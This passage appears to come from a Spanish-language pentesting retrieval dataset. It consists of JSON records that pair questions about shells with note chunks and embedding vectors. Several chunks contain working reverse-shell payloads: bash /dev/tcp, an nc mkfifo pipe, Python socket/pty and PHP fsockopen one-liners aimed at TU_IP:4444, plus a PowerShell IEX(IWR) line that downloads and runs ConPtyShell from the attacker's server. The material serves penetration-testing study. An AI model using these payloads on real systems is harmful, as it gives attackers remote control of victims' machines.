0.03697, 0.01168, 0.0324, -0.02355, -0.05939, 0.01781, -0.01312, 0.03197, -0.02387, -0.0182, 0.00021, -0.05098, -0.01391, 0.03288, 0.00777, -0.06798, 0.04256, -0.02516, -0.03576, -0.02483, -0.02041, 0.06134, 0.02132, -0.10071, -0.04786, -0.02096, -0.04566, 0.0003, -0.01439, -0.0677, -0.02049, -0.00799, 0.04242, -0.01738, 0.01356, -0.01374]} -{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Por quΓ©\n- Sin TTY: muchos exploits de Privesc Linux (los que piden `sudo`/interacciΓ³n) fallan.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "quΓ© alternativa libre a Privesc funciona sin TTY", "v": [-0.23456, 0.05006, -0.30328, 0.01766, 0.06367, -0.0077, -0.02834, -0.08448, 0.00324, 0.0215, -0.03066, -0.08189, 0.1021, 0.08487, 0.15032, -0.08795, 0.06217, -0.22358, 0.19124, 0.00666, -0.0118, -0.04328, -0.08196, -0.23826, 0.06148, -0.01195, 0.01638, -0.00712, -0.06402, 0.03057, 0.08187, -0.02571, 0.16083, -0.03384, -0.00793, 0.12131, 0.12813, 0.05085, 0.135, 0.01336, 0.10787, -0.0219, 0.00562, 0.10501, 0.03344, -0.02382, -0.01966, -0.00276, -0.07533, 0.05737, -0.16627, -0.05285, -0.05883, -0.06308, 0.02449, 0.0161, -0.00115, -0.05449, 0.0005, -0.04169, -0.14738, 0.00589, 0.0021, -0.0148, 0.08189, -0.07762, 0.02968, 0.00247, -0.05625, 0.10924, -0.00033, -0.04625, -0.04488, -0.00688, -0.07456, 0.00486, -0.0761, -0.00073, -0.03198, 0.03528, 0.05964, -0.02635, 0.04858, -0.01598, -0.05821, -0.03973, 0.03728, -0.05428, 0.00817, 0.04577, 0.0545, 0.08971, 0.01528, 0.14665, -0.01323, -0.07244, -0.02075, 0.07862, 0.03399, 0.0619, 0.15718, 0.03425, -0.07742, 0.03273, 0.0055, -0.00329, 0.00176, 0.02801, -0.03851, 0.02969, 0.02439, -0.00347, -0.0643, -0.01625, -0.01303, -0.03184, -0.11215, -0.01397, -0.0048, 0.02545, -0.09962, -0.02713, -0.01402, -0.12381, 0.04174, 0.03896, 0.08644, 0.06277, -0.0747, 0.07308, 0.04567, -0.04843, -0.02597, -0.09379, -0.0345, -0.04843, 0.04795, -0.03003, 0.02467, -0.01674, 0.03766, -0.00576, -0.0187, -0.00788, 0.03594, -0.0449, 0.04201, -0.06442, 0.02555, -0.01116, -0.0148, -0.01303, -0.03662, 0.05147, -0.00918, -0.00216, -0.0105, -0.04843, -0.03464, 0.02501, 0.03407, 0.00667, -0.08214, 0.00467, -0.04234, -0.07763, 0.02391, -0.05413, -0.03384, 0.0505, 0.03725, 0.04577, 0.08737, -0.1071, 0.05067, -0.10433, 0.00331, -0.04074, 0.03367, -0.02215, 0.03263, 0.02379, -0.06119, -0.05075, 0.00181, -5e-05, -0.00897, -0.0235, -0.00363, 0.03784, -0.01834, 0.02264, -0.03762, -0.06827, 0.01229, -0.01223, 0.00188, -0.09923, 0.01492, -0.02296, 0.00914, -0.00968, 0.02681, 0.00276, -0.00558, -0.01613, -0.01048, 0.05123, 0.0319, 0.0266, 0.04192, 0.01545, 0.06161, 0.05779, -0.03302, 0.09455, -0.01515, -0.03122, -0.02803, -0.04579, 0.00374, -0.0273, -0.01421, 0.04158, 0.00194, 0.04094, 0.02022, 0.08076, -0.00978, 0.0397, 0.0521, 0.05417, 0.01883, 0.0644, -0.03548, -0.03982, -0.04015, 0.05415, 0.01484, 0.01452, 0.02982, 0.04128, -0.00186, 0.01765, 0.01621, -0.01189, -0.02006, -0.06046, -0.03626, -0.01271, -0.02998, 0.0094, -0.0305, 0.02276, 0.03182, 0.06276]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "quΓ© programa sirve para montar un reverse shell?", "v": [0.03613, -0.02654, -0.15388, -0.10338, -0.10541, -0.09125, -0.08738, -0.07832, -0.04609, -0.09606, -0.09026, -0.01098, 0.09952, -0.14493, 0.07222, 0.08119, -0.05231, -0.14322, 0.09136, 0.04488, -0.05263, -0.04892, 0.01103, -0.18213, -0.09789, 0.1368, 0.03465, 0.00291, -0.06786, -0.04295, 0.00571, -0.04281, 0.07572, -0.06163, -0.05506, 0.02592, 0.06411, -0.08402, 0.02874, 0.05267, 0.01824, -0.0513, -0.01979, 0.13552, 0.06825, -0.02127, 0.0937, -0.06225, -0.00672, 0.03181, 0.03472, 0.01065, -0.06018, 0.09057, 0.08365, -0.05112, -0.00137, -0.14363, 0.00655, -0.04585, -0.06647, 0.07809, -0.01069, 0.01502, 0.09427, -0.05232, -0.0377, -0.0294, -0.09471, -0.06656, -0.0685, -0.04704, 0.07563, -0.00727, -0.15609, 0.00882, 0.04486, 0.01714, 0.02824, -0.02958, -0.06125, -0.02755, -0.01897, 0.13764, 0.0107, 0.00807, 0.01034, -0.04308, 0.00403, 0.01576, 0.0115, 0.14459, 0.04041, 0.08092, 0.02574, -0.15006, 0.09357, 0.13966, -0.04526, 0.07177, -0.0218, -0.06968, 0.00345, 0.15853, -0.00377, 0.07494, -0.00038, -0.02653, -0.0388, 0.13271, 0.01366, -0.01296, -0.06046, 0.06214, -0.0696, -0.08444, -0.02749, 0.03145, 0.05664, -0.02338, -0.05709, 0.11667, 0.0005, 0.05678, 0.03431, 0.03343, 0.04568, 0.14356, -0.05828, 0.09719, 0.00798, -0.03081, -0.01287, 0.01485, -0.0885, -0.02952, 0.07889, -0.00215, -0.02248, -0.01042, 0.07389, 0.08125, -0.03378, -0.0141, -0.02449, -0.02918, 0.13114, -0.10739, 0.00885, 0.02906, 0.03832, 0.1144, 0.02217, 0.01912, -0.08787, -0.11713, 0.03738, -0.03369, -0.04268, 0.03511, -0.06886, 0.00107, -0.00858, -0.00727, 0.07485, -0.06489, -0.06481, 0.03729, 0.10613, 0.08044, -0.01952, 0.06994, 0.11295, -0.0413, 0.03487, 0.06301, -0.00263, -0.0199, 0.03476, -0.0138, -0.02632, -0.00085, 0.08444, 0.02266, -0.03844, -0.00684, -0.00093, 0.07862, 0.00157, 0.00741, -0.0135, 0.00548, -0.01712, -0.03799, 0.01548, 0.01426, 0.01569, -0.05674, 0.09071, 0.00661, -0.0161, 0.0046, 0.04613, -0.00067, 0.02093, 0.05655, -0.03765, 0.00649, 0.07586, 0.10026, -0.00862, -0.00175, 0.01253, 0.12418, 0.02271, -0.00696, -0.00709, 0.06597, 0.01168, 0.1075, -0.01352, -0.06093, -0.01579, 0.07594, -0.01445, -0.07173, 0.03849, -0.00478, 0.02188, -0.00048, -0.02254, -0.03471, -0.00101, 0.03143, -0.05327, -0.02817, -0.00827, 0.00529, 0.04682, -0.0642, -0.03406, 0.08825, -0.00056, -0.08691, 0.00506, 0.02464, 0.00661, 0.00528, 0.0063, 0.0409, -0.06791, 0.02434, -0.0392, -0.03754, 0.0005, -0.00493]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "con quΓ© herramienta recibo conexiones desde una vΓ­ctima al mi listener?", "v": [0.12864, 0.14292, -0.0725, -0.15699, -0.01303, -0.0565, -0.21125, 0.04356, 0.00842, -0.05325, 0.02326, -0.05484, 0.02663, 0.01612, 0.11152, 0.01198, 0.11267, 0.06622, 0.01624, -0.06787, 0.00279, 0.07832, -0.01506, -0.01687, -0.04773, 0.06609, 0.1511, -0.00375, -0.02703, 0.07391, -0.02369, -0.11565, -0.06849, 0.11132, 0.00555, 0.00577, -0.02224, 0.14149, 0.08126, 0.08943, 0.12876, -0.0407, -0.05156, -0.02323, 0.0559, -0.04713, -0.06934, 0.01989, 0.0503, 0.16822, -0.10484, -0.06051, -0.22647, -0.07111, -0.07243, -0.06571, 0.14703, -0.15324, 0.19018, -0.06425, -0.0525, -0.00874, 0.00553, 0.01404, 0.00577, -0.08092, 0.10383, -0.01436, -0.04568, 0.04797, -0.02287, -0.00675, 0.04517, 0.01452, 0.06344, -0.01596, 0.07344, 0.0306, 0.00042, 0.00839, 0.02829, -0.08173, -0.10672, -0.02041, -0.04568, 0.16714, 0.13606, -0.05743, -0.00576, -0.05585, 0.02878, 0.01683, -0.00872, 0.01957, 0.0174, -0.11947, -0.02417, -0.11968, -0.08575, -0.04489, 0.18401, -0.05704, -0.03631, 0.09629, 0.03934, -0.03808, -0.0926, -0.00755, -0.09087, 0.00934, 0.01354, 0.09387, 0.05841, -0.02462, -0.0731, -0.04271, -0.03774, -0.05547, 0.03499, 0.00116, 0.06986, 0.06112, 0.00042, -0.02634, -0.00411, -0.00515, -0.03056, 0.01173, 0.02331, -0.04932, 0.01561, -0.00171, 0.03945, -0.06957, 0.06785, -0.04871, 0.01414, -0.14936, 0.01647, 0.02694, 0.02689, 0.01659, -0.07116, 0.00071, -0.04356, -0.09461, 0.02526, 0.00856, -0.043, -0.01257, 0.00838, -0.04102, -0.03291, -0.03966, -0.06566, -0.01471, 0.01594, -0.01432, 0.02092, 0.00811, -0.03036, -0.03235, 0.02391, -0.02728, 0.0354, -0.07681, -0.00877, 0.03974, 0.10766, 0.04857, -0.00356, -0.0689, 0.0728, -0.00064, -0.0743, -0.12562, -0.01916, 0.00578, -0.02225, -0.03321, -0.05893, 0.02829, -0.04206, -0.03894, 0.0602, 0.03411, -0.04903, -0.04959, 0.02287, 0.07503, -0.02757, 0.03042, 0.00368, 0.0208, 0.0437, -0.02668, 0.00125, -0.0027, -0.05547, 0.04663, -0.09318, 0.02483, 0.03174, -0.0577, 0.00685, 0.06163, -0.04175, -0.06547, 0.02661, 0.0307, 0.06194, 0.04529, 0.01259, -0.02888, 0.02083, -0.01125, -0.01384, 0.01668, 0.00842, 0.05724, -0.03422, -8e-05, 0.00853, -0.00725, -0.00211, 0.04164, -0.02862, 0.01455, -0.0056, -0.00138, 0.03032, -0.04105, -0.00786, -0.01933, -0.0427, -0.05813, -0.01369, -0.02525, -0.05769, 0.00891, -0.01219, 0.02705, 0.03039, 0.01372, -0.00797, 0.01885, 0.00197, -0.01946, -0.10202, -0.06505, -0.00476, 0.0324, 0.08198, -0.05727, 0.01572, -0.05101]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Reverse shell\n\n> El foothold: la vΓ­ctima se conecta de vuelta a tu listener. RecΓ­bela en el Puesto de mando Kali.", "indexar": "que tΓ©cnica uso para que la vΓ­ctima se conecte de vuelta a mi?", "v": [0.15945, 0.08027, -0.26476, -0.00768, 0.04206, -0.03797, -0.06045, -0.00748, 0.08474, -0.06263, -0.05558, -0.07357, 0.03567, 0.16267, 0.0327, -0.03111, 0.11305, -0.06936, 0.11719, -0.12693, 0.0041, -0.08086, 0.01595, -0.0182, -0.044, 0.02526, 0.07574, 0.0267, -0.06109, -0.05329, -0.02511, -0.02332, 0.02142, 0.06911, 0.03886, -0.05565, -0.00018, -0.00169, 0.10211, 0.04053, 0.03376, -0.12361, -0.12429, -0.04467, 0.13167, -0.0442, 0.00214, -0.01344, 0.02147, 0.06093, -0.09439, -0.02904, -0.1699, -0.09948, -0.10734, -0.02763, 0.10354, -0.0172, 0.07072, -0.04281, 0.0398, -0.0477, 0.00011, 0.08494, 0.07587, -0.07965, 0.07324, -0.06293, -0.10973, -0.0144, 0.02563, 0.02765, -0.00501, -0.04545, -0.0061, -0.05902, 0.00977, 0.05755, 0.09216, -0.00625, -0.00281, -0.02234, -0.10744, -0.03429, -0.08822, 0.0436, 0.1226, -0.00281, 0.09535, -0.11606, 0.05159, -0.04308, -0.01074, -0.06068, 0.03272, -0.0907, -0.02963, -0.00248, -2e-05, 0.06559, 0.11816, -0.01904, 0.0297, 0.08616, 0.04102, -0.0084, 0.02025, -0.03077, -0.04307, -0.06273, -0.04095, 0.12806, -0.03318, -0.05705, -0.09843, -0.08578, -0.04673, -0.06283, -0.1007, 0.00278, 0.1064, 0.05243, 0.11476, -0.02381, -0.00594, 0.0632, -0.07535, -0.00285, 0.00884, -0.01235, 0.00822, -0.00985, -0.024, -0.06662, 0.02563, 0.06529, 0.08535, -0.07829, -0.00039, -0.04279, 0.11294, 0.07007, -0.10286, -0.03432, -0.0077, -0.06374, 0.06735, -0.08447, -0.11775, -0.01612, 0.04045, -0.00384, -0.03051, 0.03599, -0.07177, 0.04473, -0.01159, -0.06783, 0.03502, 0.0599, -0.06576, 0.03665, 0.00296, -0.01681, -0.02638, -0.04908, -0.05931, -0.10769, 0.06959, 0.02759, -0.03516, 0.02185, -0.06309, 0.04398, -0.03804, -0.10311, 0.00646, -0.05925, -0.00552, -0.08685, -0.01971, -0.0087, -0.0499, -0.02529, -0.00851, 0.01192, -0.04878, -0.00137, 0.00027, 0.06336, -0.03303, 0.0529, 0.05937, 0.02496, -0.04628, -0.09674, -0.04327, 0.08395, -0.01278, 0.0057, -0.06887, 0.05768, -0.01127, -0.01806, 0.06274, 0.03456, -0.04153, -0.08764, -0.04516, 0.03588, 0.06079, -0.0201, 0.07225, -0.03207, 0.00516, -0.05009, 0.04057, -0.05431, -0.0192, 0.08243, 0.02151, -0.0022, -0.02093, 0.0243, 0.03125, 0.01759, 0.01479, 0.01692, -0.02344, -0.04172, -0.02966, 0.0262, -0.02847, -0.08159, 0.0261, -0.01257, 0.0334, -0.05377, -0.09198, -0.01829, 0.02188, 0.08333, 0.0017, -0.02451, -0.01245, -0.02824, -0.10514, 0.03277, -0.07844, -0.07377, 0.02962, 0.02957, 0.0752, -0.06795, 0.01225, -0.10625]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Windows (PowerShell, interactiva con ConPtyShell)\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\nEl script se sirve desde tu HTTP (Transferencia de ficheros).", "indexar": "que programa es para ejecutar comandos en consola remota", "v": [0.15053, -0.03058, -0.1564, -0.15901, 0.04542, -0.14742, 0.11593, -0.05312, -0.07091, -0.04771, -0.15895, 0.02266, 0.14228, -0.08358, 0.02284, 0.02942, 0.14989, 0.02446, 0.00271, -0.00418, 0.07254, -0.06857, 0.10069, -0.029, 0.04729, 0.0259, 0.13049, 0.07286, 0.02325, -0.12879, -0.01863, -0.04575, 0.13428, -0.10165, 0.01321, 0.05473, -0.06282, -0.0419, 0.01336, 0.04739, 0.0209, 0.07329, -0.12059, -0.05134, 0.07945, -0.09305, 0.16549, 0.00921, 0.06168, -0.10941, 0.00882, -0.02018, 0.00388, -0.03294, 0.05781, -0.08175, 0.10167, -0.11479, 0.01126, 0.05384, -0.01167, -0.11184, 0.08805, 0.04943, 0.01208, 0.01583, -0.06408, -0.1474, -0.07368, 0.08629, -0.1606, -0.00058, -0.02293, 0.02636, 0.00287, -0.07164, -0.13192, -0.07772, 0.11724, -0.06326, -0.03998, -0.07816, -0.07994, 0.03409, -0.04296, -0.08114, -0.05149, -0.05202, -0.03645, -0.0777, 0.01623, -0.06267, -0.0103, 0.10374, 0.13334, 0.02826, 0.12588, 0.00079, 0.04458, 0.00719, 0.01492, -0.014, -0.10589, 0.13965, -0.04563, 0.0685, 0.07299, -0.03523, 0.01576, 0.04346, 0.01451, -0.01113, -0.01014, -0.01962, -0.0865, -0.04075, -0.07867, -0.04673, 0.1124, -0.01968, -0.10954, 0.07568, -0.03129, 0.01492, 0.04948, -0.02796, -0.0734, 0.04509, 0.02881, 0.05212, -0.03003, -0.07178, 0.0927, -0.04209, -0.0436, 0.08658, -0.01561, -0.05383, -0.0536, -0.13726, 0.05527, 0.07867, 0.02757, 0.00936, 0.11468, 0.00747, 0.06353, -0.02568, 0.00091, 0.03067, 0.09025, 0.03641, -0.03628, 0.02554, -0.02514, -0.0172, -0.0169, 0.04451, -0.08523, 0.06607, -0.0371, -0.05047, -0.08726, -0.0616, 0.04579, -0.04581, -0.03492, 0.02029, 0.00961, 0.04409, -0.06407, 0.04672, 0.03746, -0.0239, 0.01202, -0.03214, 0.01161, -0.00918, 0.02257, -0.02556, -0.0764, 0.06496, 0.00842, -0.0546, -0.02765, -0.03283, -0.05276, -0.00331, -0.00279, -0.02735, 0.00362, 0.03808, -0.0372, -0.03084, 0.03517, 0.01071, -0.01089, -0.01197, -0.06241, -0.03891, -0.02264, 0.02152, 0.01977, -0.04571, 0.04549, 0.03264, -0.00363, 0.04047, 0.00875, 0.06709, 0.02182, 0.01354, 0.02898, 0.05414, -0.00438, -0.0742, 0.02354, 0.00891, 0.03316, 0.02965, -0.01951, -0.01343, 0.08341, -0.03169, -0.00989, -0.01838, 0.02043, 0.02177, 0.02035, -0.07117, 0.02674, -0.0339, 0.01344, -0.03348, 0.00707, -0.00872, 0.00779, -0.03649, 0.02322, -0.01684, -0.04076, 0.05333, -0.00326, -0.08391, -0.02049, -0.06581, -0.07571, -0.00541, -0.01271, -0.01099, -0.0241, 0.00839, 0.01458, -0.04249, -0.03764, 0.02941]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Windows (PowerShell, interactiva con ConPtyShell)\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\nEl script se sirve desde tu HTTP (Transferencia de ficheros).", "indexar": "cual herramienta me permite interactuar con un servidor a travΓ©s de una conexiΓ³n personalizada", "v": [0.0244, 0.1683, -0.22766, -0.19553, 0.03137, -0.11681, -0.05212, -0.06927, -0.00527, -0.07145, -0.04515, -0.02217, 0.01967, -0.08211, 0.02751, 0.09267, 0.15932, -0.08083, -0.00558, 0.03733, 0.05323, 0.07759, -0.09834, -0.1, -0.11883, -0.0517, 0.08014, -0.03115, -0.07762, -0.00615, -0.03346, -0.03296, 0.08162, -0.00811, -0.04602, -0.16671, -0.05267, 0.18676, 0.01128, -0.0077, -0.01125, -0.0059, -0.07739, 0.0961, 0.08927, 0.06322, -0.03032, -0.05792, 0.03578, 0.09281, -0.13668, -0.04525, -0.18588, -0.00692, -0.01925, -0.06849, 0.20685, -0.12524, 0.07881, -0.04538, -0.14594, 0.01264, -0.10161, -0.05302, 0.09062, -0.06319, -0.02951, -0.09115, -0.11245, 0.06465, 0.00181, 0.04305, -0.00956, -0.05547, 0.06744, 0.10542, 0.02128, 0.02754, 0.07653, 0.02556, 0.05779, 0.00278, -0.02766, 0.0624, -0.05552, -0.01481, 0.07759, -0.02555, 0.04527, 0.01324, 0.05833, 0.03791, -0.06036, -0.01059, -0.00968, -0.08578, 0.07118, -0.0978, -0.02996, -0.01477, 0.1492, 0.04822, -0.12096, 0.06485, -0.02255, -0.00028, 0.01907, -0.02179, -0.0032, -0.00508, 0.11072, 0.02003, 0.04672, -0.00372, 0.00726, -0.00365, -0.01217, -0.05006, 0.02564, -0.03486, -0.06447, 0.04445, -0.01774, -0.03472, 0.01986, -0.00965, -0.01199, 0.05589, -0.03046, -0.03126, -0.02878, -0.02109, -0.04604, -0.05982, 0.026, -0.00814, 0.03304, -0.12589, -0.01983, -0.06553, 0.01864, -0.02442, 0.00623, -0.0613, 0.08955, -0.00092, 0.04514, -0.05394, -0.08556, 0.06168, -0.01671, -0.0302, -0.03293, 0.00926, -0.09682, 0.00165, -0.05103, -0.01054, -0.06662, 0.056, -0.01194, -0.00811, 0.06821, 0.05677, 0.00252, -0.0432, -0.03929, 0.02305, 0.06708, 0.06093, -0.03295, 0.01122, 0.01104, 0.01599, -0.02874, -0.01483, -0.09352, -0.0448, 0.00279, -0.05409, -0.05197, -0.01797, 0.01195, -0.06843, -0.0448, -0.0819, -0.04672, -0.01349, -0.00588, 0.04977, 0.00694, 0.05726, -0.04026, 0.02827, 0.07101, -0.04842, -0.00265, -0.03665, 0.02347, -0.00235, -0.01411, -0.00751, -0.03189, -0.05087, -0.01906, 0.07487, -0.01938, -0.00036, -0.02356, 0.0061, 0.01806, -0.02113, 0.11432, -0.02344, 0.001, 0.00348, 0.0115, -0.08423, 0.00349, 0.01646, 0.03456, -0.04136, 0.07283, -0.00627, 0.01688, 0.0233, 0.02136, 0.0139, -0.01676, -0.05778, -0.0453, -0.05323, -0.03613, -0.04295, 0.05425, -0.02156, 0.03464, -0.06957, -0.0836, -0.07542, 0.01008, 0.0905, -0.00532, -0.03198, 0.01767, -0.07203, -0.02756, -0.01893, -0.0665, -0.07862, -0.04354, -0.02416, 0.07493, -0.01339, 0.03767, -0.02788]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "que herramienta sirve para crear un payload reverse shell en bash?", "v": [0.12887, -0.01042, -0.16641, -0.13501, -0.02913, -0.13544, -0.07149, -0.07772, 0.02469, 0.01443, -0.1554, -0.01903, 0.01908, -0.04374, -0.03597, 0.08037, -0.14289, -0.06313, -0.0342, 0.00153, 0.02189, 0.05172, -0.09671, -0.03191, -0.079, 0.09633, -0.01172, 0.0088, -0.27854, 0.07973, -0.0396, -0.02865, 0.07674, -0.04058, -0.04974, 0.01853, -0.01692, 0.04174, -0.05073, 0.16198, -0.0307, 0.08699, -0.12194, 0.1815, 0.08929, -0.00418, 0.0699, 0.04232, 0.03084, 0.03038, -0.01362, -0.10777, -0.21186, 0.11196, 0.05847, -0.11941, 0.20067, -0.19204, -0.04496, -0.06806, -0.18613, 0.07618, -0.04685, -0.01823, -0.00372, -0.04653, -0.05204, -0.10284, -0.07988, -0.01592, -0.01776, -0.00898, 0.02903, 0.05174, -0.02935, -0.01909, 0.00501, 0.07491, 0.00127, 0.06264, -0.01805, -0.05328, -0.0876, 0.02504, -0.02481, -0.07731, 0.04963, 0.01411, 0.08114, -0.03669, -0.01773, 0.07009, -0.04756, 0.08722, -0.00731, -0.01877, 0.0651, -0.06887, -0.03808, 0.01337, 0.07741, -0.05852, 0.047, 0.04007, 0.06133, 0.02629, -0.00661, -0.05904, -0.01407, 0.06, 0.13691, -0.07632, 0.10492, 0.0366, -0.03864, -0.03167, -0.04142, 0.0282, 0.0334, -0.0297, 0.05137, 0.01526, -0.03874, 0.00959, -0.03124, -0.03471, -0.08863, 0.11215, 0.01679, 0.00163, 0.01287, 0.00904, -0.01188, 0.05981, -0.03035, 0.01572, 0.10881, -0.04987, -0.03783, -0.03223, 0.05999, 0.14157, -0.02122, -0.07353, 0.00499, 0.00663, 0.05889, -0.08497, -0.05464, -0.00224, 0.03365, 0.01488, -0.01942, -0.00609, -0.09012, -0.06107, 0.03595, 0.0194, -0.06428, -0.01129, -0.0321, 0.02096, -0.00775, 0.03819, -0.00057, -0.05493, -0.05006, 0.00616, 0.03894, 0.10977, 0.00738, -0.01426, 0.09131, -0.01013, 0.04204, -0.03139, -0.04436, -0.00763, 0.03123, -0.04232, -0.0152, -0.0313, -0.01989, -0.01453, 0.01652, -0.04935, 0.04289, 0.03561, 0.02412, 0.04984, 0.00536, 0.07685, 0.00863, -0.09939, -0.02477, 0.03574, 0.00025, -0.07997, 0.07726, 0.0382, 0.02841, 0.00974, -0.00136, -0.04796, -0.02006, 0.02454, -0.0677, -0.01077, 0.02552, -0.01463, 0.04825, -0.00672, 0.03996, 0.04693, -0.00346, -0.02466, 0.01578, -0.00648, -0.00489, 0.04252, -0.01586, -0.01783, 0.00866, -0.01147, -0.03368, 0.02708, 0.05394, -0.00761, 0.02741, -0.03015, 0.03222, 0.0036, -0.00043, 0.02063, -0.0116, -0.0409, 0.00983, -0.02634, -0.0257, -0.00437, -0.00708, 0.0151, -0.04304, -0.078, -0.00358, -0.02447, 0.03122, -0.00511, -0.0495, -0.03396, -0.03753, 0.04903, 0.02113, -0.01744, 0.00579, -0.02784]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TU_IP 4444 >/tmp/f # nc sin -e\npython3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"TU_IP\",4444));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'\nperl -e 'use Socket;...' # cuando solo hay perl\nphp -r '$s=fsockopen(\"TU_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n```\n> MΓ‘s payloads (war/aspx/jsp, x64, encoders) β†’ genera con msfvenom. Referencia viva: revshells.com.", "indexar": "con que puedo montar una conexiΓ³n de shell inverso usando python o perl?", "v": [0.17884, 0.00915, -0.20357, -0.05941, -0.07639, -0.06127, -0.03944, -0.08183, -0.11053, -0.09094, -0.05159, 0.11467, 0.03208, -0.0578, -0.0454, 0.01082, -0.10735, -0.04788, 0.06703, -0.09425, -0.09041, 0.01166, -0.09695, -0.15372, 0.04845, 0.17422, 0.01787, -0.00554, -0.0631, -0.08809, -0.0327, 0.01266, 0.0858, 0.02388, -0.11173, -0.03634, 0.04361, 0.11345, 0.05038, 0.09835, -0.10662, -0.01946, -0.08503, 0.1735, -0.0225, 0.01252, 0.01379, -0.044, -0.04112, 0.03383, -0.04357, -0.06617, -0.21406, -0.02719, 0.04368, -0.06746, 0.16222, -0.03505, 0.17845, -0.03959, -0.09067, 0.003, -0.03452, 0.12866, 0.07246, -0.06053, -0.07691, -0.0815, -0.16856, 0.03386, -0.07154, 0.04106, -0.05396, 0.00867, 0.0586, 0.0631, 0.01609, -0.03089, 0.01258, 0.06786, -0.16607, -0.08671, 0.03475, 0.08579, -0.00969, -0.0826, 0.01287, -0.07308, 0.06372, -0.01129, 0.00326, 0.08592, 0.01836, -0.08191, -0.01204, -0.02977, -0.0425, 0.01052, 0.03105, 0.03222, -0.02504, 0.0277, -0.00091, 0.19493, 0.01715, 0.02605, 0.0012, 0.02764, -0.00381, 0.02555, 0.05712, -0.03934, -0.03135, -0.03873, -0.021, -0.14178, -0.07075, 0.00138, -0.01798, 0.01604, -0.02416, 0.01802, 0.00439, 0.10128, -6e-05, -0.02198, 0.06466, 0.15406, -0.02814, 0.02003, -0.03421, 0.00344, -0.0244, -0.03789, -0.01491, 0.14678, 0.05978, -0.00118, -0.0207, -0.01818, 0.02395, 0.03328, -0.0218, -0.03269, 0.01256, 0.03031, 0.05759, -0.10229, -0.10713, -0.02392, 0.00059, 0.09537, 0.041, 0.02953, -0.07717, -0.03195, 0.00668, -0.05339, 0.01383, 0.04418, -0.03379, 0.01056, 0.00058, -0.01613, -0.01083, -0.06764, -0.07422, -0.03455, 0.08378, -0.006, -0.04661, 0.0392, -0.01192, 0.01942, 0.05059, -0.00991, -0.01306, 0.03223, -0.03357, -0.03119, 0.02655, -0.06429, -0.04715, -0.08628, 0.01244, 0.06967, 0.06072, 0.02892, 9e-05, 0.00369, -0.01137, 0.05315, 0.00184, 0.03929, -0.00857, -0.01104, 0.04178, -0.01249, 0.07662, 0.01654, 0.01978, 0.00471, 0.00069, -0.004, 0.04534, 0.04112, -0.10472, 0.05814, -0.01069, 0.02575, 0.04291, -0.01705, 0.03044, 0.04949, 0.02167, -0.01093, 0.04281, 0.03073, -0.00327, 0.03617, -0.03214, 0.06054, 0.06121, 0.04356, 0.01096, -0.02718, 0.00347, -0.02082, 0.05012, 0.03109, -0.08176, 0.03581, -0.01614, -0.04249, -0.0172, 0.02383, -0.00206, -0.00567, -0.00169, -0.00287, 0.02896, 0.08131, -0.01104, -0.05602, 0.00225, -0.02555, -0.04104, 0.02145, -0.03094, -0.01001, -0.02556, 0.02974, 0.00343, -0.05152, -0.02735, -0.05524]} -{"tipo": "pregunta", "herramienta": "Reverse shell", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Reverse shell.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "### Linux (varios lenguajes)\n```bash\nbash -i >& /dev/tcp/TU_IP/4444 0>&1\nrm /tmp/f;mkfifo /tmp/f;cat 